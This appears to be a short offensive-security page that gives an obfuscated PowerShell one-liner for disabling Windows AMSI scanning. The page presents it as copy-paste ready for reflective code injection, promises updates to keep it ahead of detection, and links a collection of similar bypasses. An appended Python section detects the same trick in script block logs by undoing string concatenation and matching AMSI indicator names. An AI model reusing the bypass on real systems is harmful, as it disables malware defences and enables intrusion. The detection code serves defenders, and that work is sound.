AntiVirus Bypass

Quick PowerShell AMSI bypass:

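# Look up the non-public static field amsiInitFailed on System.Management.Automation.AmsiUtils via reflection.
# The type and field names are split into fragments so the full strings never appear in the script text.
$foo= [Ref].Assembly.GetType('S'+'yste'+'m.Ma'+'nage'+'me'+'nt.'+'Autom'+'at'+'ion.'+'Am'+'si'+'Ut'+'il'+'s').GetField('am'+'s'+'iInitF'+'ai'+'l'+'e'+'d','NonPu'+'blic,St'+'at'+'ic')

# Set the field to $true so the session treats AMSI initialisation as failed.
$foo.SetValue($null,$true)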

This will work on the latest versions of Windows and allow reflective code injection, etc. I will keep this updated if this specific string gets detected. Otherwise, it should be a straight copy and paste.

There is also a comprehensive list here:

https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

Note

These will be detected as is, and will need to be modified.
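
From the detection side, splitting the names into fragments, as the one-liner above does, only hides them from rules that match the raw script text. The following added example (not part of the original page) joins concatenated literals before matching. It assumes PowerShell script block logging (Event ID 4104) text has been exported into records; the `record_id` / `script_block_text` layout and the sample records are constructed for illustration.

```python
import re

# Names the page's one-liner reassembles at run time (taken from that snippet).
INDICATORS = ("amsiutils", "amsiinitfailed")

# A closing quote, '+', and an opening quote of the same kind: 'Am'+'si'
_CONCAT = re.compile(r"""(['"])\s*\+\s*\1""")


def normalise(script_text):
    """Join concatenated string literals, then lower-case for matching."""
    return _CONCAT.sub("", script_text).lower()


def amsi_tamper_hits(script_text):
    """Indicators present once the concatenation has been undone."""
    flat = normalise(script_text)
    return [name for name in INDICATORS if name in flat]


def scan(events):
    """Return one finding per event that references the AMSI internals."""
    findings = []
    for event in events:
        text = event["script_block_text"]
        hits = amsi_tamper_hits(text)
        if hits:
            # naive_match shows whether a plain substring rule would have fired
            naive = any(name in text.lower() for name in INDICATORS)
            findings.append({"record_id": event["record_id"],
                             "hits": hits, "naive_match": naive})
    return findings


# Constructed sample records; the first reuses the lookup line shown on this page.
SAMPLE_EVENTS = [
    {"record_id": 101, "script_block_text":
        "$foo= [Ref].Assembly.GetType('S'+'yste'+'m.Ma'+'nage'+'me'+'nt.'+'Autom'"
        "+'at'+'ion.'+'Am'+'si'+'Ut'+'il'+'s').GetField('am'+'s'+'iInitF'+'ai'+'l'"
        "+'e'+'d','NonPu'+'blic,St'+'at'+'ic')"},
    {"record_id": 102, "script_block_text": "$msg = 'Back'+'up ' + \"done\""},
    {"record_id": 103, "script_block_text":
        "Get-ChildItem C:\\Temp | Where-Object Length -gt 1MB"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Record 101 is reported with `naive_match` set to `False`, meaning a plain substring rule on the raw text would have missed it, while the benign concatenation in record 102 is not flagged.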